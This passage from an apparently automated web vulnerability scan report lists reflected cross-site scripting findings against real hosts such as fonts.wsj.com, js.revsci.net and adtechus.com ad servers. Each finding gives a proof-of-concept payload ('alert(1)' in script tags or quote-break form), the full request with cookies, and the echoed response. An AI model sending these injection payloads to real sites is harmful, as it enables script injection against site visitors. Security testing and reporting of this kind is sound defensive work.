Confidence:   Certain
Host:   http://fonts.smartmoney.com
Path:   /k/fnb4igi-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90094<script>alert(1)</script>f3f7caa5adf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k90094<script>alert(1)</script>f3f7caa5adf/fnb4igi-e.css?3bb2a6e53c9684ffdc9a9bf31b5b2a62f8640158474e9a4e257a3362938781107c2321f82aee360d63d8b59ad159efe966579760760edc3ac821b3536248373d007b334a43b36d48f723dced5b3815a55b468a23eed2e563129ff64721d802fd05e366961e0f98a6e5fb0c1ba7a5128716a9abd1c86f667e88ca3006e9271ef5d3f98c93a7187b590b911c62e2e3844e89da31316af333 HTTP/1.1
Host: fonts.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=2f47fc3e-f5cc-45d9-a394-82d100bc56a1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000848
Content-Length: 68
Date: Wed, 07 Sep 2011 12:28:45 GMT
Connection: close

Not Found: /k90094<script>alert(1)</script>f3f7caa5adf/fnb4igi-e.css

1.76. http://fonts.smartmoney.com/k/fnb4igi-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.smartmoney.com
Path:   /k/fnb4igi-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39455<script>alert(1)</script>00a2511bc5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/fnb4igi-e.css39455<script>alert(1)</script>00a2511bc5d?3bb2a6e53c9684ffdc9a9bf31b5b2a62f8640158474e9a4e257a3362938781107c2321f82aee360d63d8b59ad159efe966579760760edc3ac821b3536248373d007b334a43b36d48f723dced5b3815a55b468a23eed2e563129ff64721d802fd05e366961e0f98a6e5fb0c1ba7a5128716a9abd1c86f667e88ca3006e9271ef5d3f98c93a7187b590b911c62e2e3844e89da31316af333 HTTP/1.1
Host: fonts.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=2f47fc3e-f5cc-45d9-a394-82d100bc56a1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000818
Content-Length: 68
Date: Wed, 07 Sep 2011 12:28:45 GMT
Connection: close

Not Found: /k/fnb4igi-e.css39455<script>alert(1)</script>00a2511bc5d

1.77. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.wsj.com
Path:   /k/qox0wee-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f389<script>alert(1)</script>225d205b362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k7f389<script>alert(1)</script>225d205b362/qox0wee-e.css?3bb2a6e53c9684ffdc9a9bf61d5b2a62d6138ae381e419350a9e4b6a2ea4b26f81a44a9a3fd76d172c69fe2029381463ad3b2b9f57efd95582df0742cea8deb803244f67617f9d0625a9b0c6afe6273d11b54d031342ae7abf5f75e41d0992b0561404d8a9488b9b7abb6b HTTP/1.1
Host: fonts.wsj.com
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; s_dbfe=1315153085111; wsjregion=na%2cus; s_vnum=1317745085110%26vn%3D2; grvinsights=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; DJSESSION=continent%3Dna%7C%7Czip%3D95101%7C%7Ccountry%3Dus%7C%7Cregion%3Dca%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dsanjose%7C%7Clongitude%3D-121.8938%7C%7Ctimezone%3Dpst%7C%7Clatitude%3D37.3353%7C%7CBIZO%3Dbiz%3D1053%3B; mbox=check#true#1315416125|session#1315416064836-197145#1315417925|PC#1315416064836-197145.19#1316625672; DJCOOKIE=ORC%3Dna%2Cus%7C%7CGC%3D1%7C%7CGX%3DMon%2C%2005%20Sep%202011%2016%3A18%3A04%20GMT%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2268%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DWed%2C%2007%20Sep%202011%2017%3A40%3A52%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000783
Content-Length: 68
Date: Wed, 07 Sep 2011 12:21:09 GMT
Connection: close

Not Found: /k7f389<script>alert(1)</script>225d205b362/qox0wee-e.css

1.78. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.wsj.com
Path:   /k/qox0wee-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 305f9<script>alert(1)</script>8e97949099a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/qox0wee-e.css305f9<script>alert(1)</script>8e97949099a?3bb2a6e53c9684ffdc9a9bf61d5b2a62d6138ae381e419350a9e4b6a2ea4b26f81a44a9a3fd76d172c69fe2029381463ad3b2b9f57efd95582df0742cea8deb803244f67617f9d0625a9b0c6afe6273d11b54d031342ae7abf5f75e41d0992b0561404d8a9488b9b7abb6b HTTP/1.1
Host: fonts.wsj.com
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; s_dbfe=1315153085111; wsjregion=na%2cus; s_vnum=1317745085110%26vn%3D2; grvinsights=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; DJSESSION=continent%3Dna%7C%7Czip%3D95101%7C%7Ccountry%3Dus%7C%7Cregion%3Dca%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dsanjose%7C%7Clongitude%3D-121.8938%7C%7Ctimezone%3Dpst%7C%7Clatitude%3D37.3353%7C%7CBIZO%3Dbiz%3D1053%3B; mbox=check#true#1315416125|session#1315416064836-197145#1315417925|PC#1315416064836-197145.19#1316625672; DJCOOKIE=ORC%3Dna%2Cus%7C%7CGC%3D1%7C%7CGX%3DMon%2C%2005%20Sep%202011%2016%3A18%3A04%20GMT%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2268%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DWed%2C%2007%20Sep%202011%2017%3A40%3A52%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000944
Content-Length: 68
Date: Wed, 07 Sep 2011 12:21:09 GMT
Connection: close

Not Found: /k/qox0wee-e.css305f9<script>alert(1)</script>8e97949099a

1.79. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e3385<script>alert(1)</script>282fccfaf51 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07608e3385<script>alert(1)</script>282fccfaf51 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 07 Sep 2011 12:20:41 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 08 Sep 2011 12:20:41 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 12:20:41 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07608E3385<SCRIPT>ALERT(1)</SCRIPT>282FCCFAF51" was not recognized.
*/

1.80. http://jtools.smartmoney.com/marketspectrum/spectrumServer [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://jtools.smartmoney.com
Path:   /marketspectrum/spectrumServer

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload a831d<a>d56f8d9a874 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /marketspectrum/spectrumServer?action=mapData&src=marketdata&jsoncallback=a831d<a>d56f8d9a874&_=1315416558211 HTTP/1.1
Host: jtools.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=2f47fc3e-f5cc-45d9-a394-82d100bc56a1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:29:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-MACHINE: SBKRJRNAPPP02
Content-Type: application/x-javascript
Content-Length: 990
Set-Cookie: NSC_tnz-ksvo-iuuq=ffffffff09f93b9a45525d5f4f58455e445a4a423660;expires=Wed, 07-Sep-2011 12:44:30 GMT;path=/

a831d<a>d56f8d9a874({"timeInfo":{"timestamp":"8:28am EDT, 9/7/2011","stamp":"1315398498479"},"data":{name: "THE MARKET", children:[{"name":"HEALTH CARE","value":"-0.15","size":"1752128896000"},{"name":"FINANCIAL","value"
...[SNIP]...

1.81. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 653bf"-alert(1)-"673a59be96f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai653bf"-alert(1)-"673a59be96f/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai653bf"-alert(1)-"673a59be96f/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.82. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f57"-alert(1)-"2fd9033c9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php47f57"-alert(1)-"2fd9033c9bd?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php47f57"-alert(1)-"2fd9033c9bd?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.83. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbdcb"-alert(1)-"56df82312b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naicbdcb"-alert(1)-"56df82312b0/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naicbdcb"-alert(1)-"56df82312b0/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.84. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db9a5"-alert(1)-"bddaee1fcc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpdb9a5"-alert(1)-"bddaee1fcc4?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpdb9a5"-alert(1)-"bddaee1fcc4?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.85. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f75b"-alert(1)-"2a1250a692f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai4f75b"-alert(1)-"2a1250a692f/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai4f75b"-alert(1)-"2a1250a692f/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.86. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7286"-alert(1)-"dc5589e669e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpd7286"-alert(1)-"dc5589e669e?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpd7286"-alert(1)-"dc5589e669e?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.87. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

